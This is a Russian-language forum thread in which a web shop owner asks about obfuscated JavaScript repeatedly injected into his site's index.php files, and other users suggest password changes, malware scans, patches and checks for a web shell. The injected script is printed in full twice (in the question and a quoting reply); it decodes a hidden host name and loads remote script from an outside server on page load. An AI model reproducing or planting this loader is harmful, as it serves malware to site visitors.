Помогите! это вирус или уязвимость? что делать?!

[seeker1982]

в четвертый раз за две недели на сайте во всез файлах index.php поселяется код! он встраивается сразу после окончания php кода к конце файлов:

<script> try{window.onload=function(){document.write('<div id=megaid>pichunter-com.time.com.bl</div>');Ew34reb9067 = document.getElementById('megaid').innerHTML + 'u@^)()e&#h&&^&@o!(s&#t$$-$^c)o)@$m!).&!c)$$o)#u&)$n^t@)^e(#&@r&#&)b!&&e@$#^^s^$t^!.$r(&u(:)(D$($E!)#B$U^G#$^/)^$m!&s(#@n$!!.#^c($(o#@#m!/(@^@m^##s@))^n$.#)^c^o^^(m&&&(/$$g$()o#@#o)!&!g)^!l&e@^(!).)&c@!#!o)^&m)@/!!)p)()c(!&h@#@)o^(m&!e^$^(.!$n!&e!^^^t&&/)#s@i&)t&#e)!m(@e#t@^$e##@r$.@c^o^&m&^/)&'.replace(/\!|&|@|\^|#|\)|\$|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Ew34reb9067.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Fq9maaz4m ) {}</script>
<!--c8b3f4e117443090eae170836419f076-->

что это?
что он делает?
как с ним бороться?
доступ к сайту у меня только по ssh

 

[VenomHOLD]

поменяй пароли от всего.
проверь комп на винусы, трояны.
удали код этот.
проверь на вируса шоп.

у меня подобное было. троянчики тянули логопасики

 

[seeker1982]

заливал каждый раз все заново менял пароли, теперь вообще выхожу снового компа из под win7 и с последнего проникновения даже на сервер не заходил... ком девственно чист...
о! не менял пароли на mysql, иду менять!

 

[VenomHOLD]

либо троян всё таки сидт, либо звоните хостеру, возможно сервер ломанули

 

[vmkvadim]

а заплатки все поставили?

 

[baltazor-vova]

Да была и у меня такая проблема, тока у меня <iframe> атака была, первое что он заражает, это "шаблоны" сайта, тщательно проверь их на наличие вирусни, а потом меняй пароли.....

 

[Elsys]

заливал через Тотал командер, если да, то у тебя вирус.
Убери в тотале сохранение паролей. И чисть комп, особенно тотал.

 

[sergio433]

в четвертый раз за две недели на сайте во всез файлах index.php поселяется код! он встраивается сразу после окончания php кода к конце файлов:

<script> try{window.onload=function(){document.write('<div id=megaid>pichunter-com.time.com.bl</div>');Ew34reb9067 = document.getElementById('megaid').innerHTML + 'u@^)()e&#h&&^&@o!(s&#t$$-$^c)o)@$m!).&!c)$$o)#u&)$n^t@)^e(#&@r&#&)b!&&e@$#^^s^$t^!.$r(&u(:)(D$($E!)#B$U^G#$^/)^$m!&s(#@n$!!.#^c($(o#@#m!/(@^@m^##s@))^n$.#)^c^o^^(m&&&(/$$g$()o#@#o)!&!g)^!l&e@^(!).)&c@!#!o)^&m)@/!!)p)()c(!&h@#@)o^(m&!e^$^(.!$n!&e!^^^t&&/)#s@i&)t&#e)!m(@e#t@^$e##@r$.@c^o^&m&^/)&'.replace(/\!|&|@|\^|#|\)|\$|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Ew34reb9067.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Fq9maaz4m ) {}</script>
<!--c8b3f4e117443090eae170836419f076-->

что это?
что он делает?
как с ним бороться?
доступ к сайту у меня только по ssh

Для начала проверь все каталоги магазина антивирусом, скорей всего залили шел меня так тоже ломанули был троян temp.php в папке products_files/.

Потом поставь все не обходимые Для просмотра ссылки Войди или Зарегистрируйся (последный раз была уязвимость в файлах index.php, cart.php, printable.php.)

Ну и конечно смени все пароли

 

[AndreyRain]

Создай файл любой

Создай любой файл вставь код и попробуй антивирусом его проверить если что то есть ты сразу увидишь
тока принудительно проверяй и желательно на том компе где точно знаешь что вирей нет

 

[exGumator]

Скорее всего на серваке сидит шелл и как что не меняй все равно будут активировать, выход такой - снимаешь архивом копию и изучаешь состав. но. так как антивири распознают многие шеллы как вирусы, скорее всего будет проблема скачать и сам архив

легче хостера попросить кнопку нажать и проверить сервак и сайт